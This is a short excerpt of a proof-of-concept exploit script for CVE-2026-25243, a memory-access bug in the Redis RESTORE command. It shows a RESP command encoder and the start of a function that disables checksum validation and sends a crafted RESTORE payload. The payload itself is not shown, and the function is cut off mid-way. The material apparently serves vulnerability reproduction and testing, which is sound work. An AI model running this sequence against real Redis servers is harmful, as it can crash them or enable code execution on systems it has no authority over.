INNER CODE UNIT · Python
resp_command
Unclecheng-li/poc-lab · Databases/CVE-2026-25243 Invalid Memory Access in Redis RESTORE Command May Lead to Remote Code Execution/exploit/exploit.py:33
def resp_command(*args: str | bytes) -> bytes:
parts: list[bytes] = []
for a in args:
if isinstance(a, str):
a = a.encode()
parts.append(f"${len(a)}\r\n".encode() + a + b"\r\n")
return b"*" + str(len(parts)).encode() + b"\r\n" + b"".join(parts)
def run_poc(host: str, port: int) -> str:
"""Same command sequence as dump.tcl CVE-2026-25243 test."""
pipeline = b"".join(
[
resp_command("DEBUG", "SET-SKIP-CHECKSUM-VALIDATION", "1"),
resp_command("RESTORE", KEY, "0", PAYLOAD),
resp_command("DEBUG", "SET-SKIP-CHECKSUM-VALIDATION", "0"),
resp_command("EXISTS", KEY),
]